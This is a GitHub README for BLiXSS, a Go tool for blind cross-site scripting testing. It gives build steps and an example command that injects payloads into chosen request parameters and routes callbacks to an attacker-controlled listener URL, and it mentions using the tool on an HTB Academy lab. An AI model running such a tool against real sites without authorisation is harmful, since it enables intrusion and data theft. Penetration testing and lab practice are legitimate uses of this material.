Skip to content

Latest commit

 

History

History
54 lines (32 loc) · 1.54 KB

README.md

File metadata and controls

54 lines (32 loc) · 1.54 KB

Blind XSS Tool (BLiXSS)

BLiXSS is a command-line tool designed for blind XSS (Cross-Site Scripting) testing. It crafts a malicious payload to inject into web application parameters, allowing you to detect potential vulnerabilities.

blixss

Using BLiXSS with the Academy HTB XSS final assessment to get the flag using a single command

Installation

Clone the repository:

git clone https://github.com/lrluque/blixss.git

Navigate to the blixss directory:

cd blixss

Build the executable:

go build blixss.go

Usage

BLiXSS requires the following parameters:

  • -t: Target URL (e.g., http://example.com)
  • -b: Body strings with the parameters of the request (e.g., "parameter1=XSS&parameter2=test2&parameter3=XSS")
  • -l: URL to forward the requests to (e.g., http://10.10.15.122:45000)
  • -d: Specifies a custom directory to make the GET request. If not specified, it will attach /<<paramName>> on the request.

Example usage:

./blixss -t "http://example.com" -b "parameter1=XSS&parameter2=test2&parameter3=XSS" -l "http://10.10.15.122:45000" -d "custom/request/directory"

Parameter values different from 'XSS' will not be tested.

Disclaimer

This tool is for educational purposes only. Do not use it for any illegal activities. I am not responsible for any misuse or damage caused by BLiXSS.

License

This project is licensed under the MIT License - see the LICENSE file for details.